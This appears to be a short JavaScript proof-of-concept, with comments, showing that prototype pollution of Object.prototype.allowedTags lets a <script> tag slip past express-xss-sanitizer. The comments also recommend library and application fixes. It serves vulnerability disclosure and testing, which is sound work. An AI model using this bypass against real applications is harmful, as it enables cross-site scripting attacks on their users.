// Demonstrates how a polluted Object.prototype can change what express-xss-sanitizer lets through.
// Background reading:
// https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/
const xssSanitizer = require("express-xss-sanitizer");

// Sample input: a harmless heading followed by a <script> element that the
// sanitizer is expected to strip.
const untrustedHtml = "<h1>Hi</h1><script>alert()</script>";

// Stands in for the end state of a prototype-pollution bug elsewhere in the
// application: from here on every plain object, including the empty options
// object passed below, inherits an `allowedTags` property.
Object.prototype.allowedTags = ['script'];

// The caller supplies no options of its own.
// NOTE(review): presumably the library reads `options.allowedTags` without an
// own-property check and so picks up the inherited value; confirm against the
// installed version.
const sanitizedHtml = xssSanitizer.sanitize(untrustedHtml, {});

// If the <script> element is still present in the printed output, the installed
// version is affected. The fix belongs in two places: the library should read
// options via own-property checks (Object.hasOwn) or copy them onto a
// null-prototype object, and the application should remove the pollution
// source. Freezing Object.prototype at startup is an additional hardening step.
console.log(sanitizedHtml);
Created from: https://npm.runkit.com/express-xss-sanitizer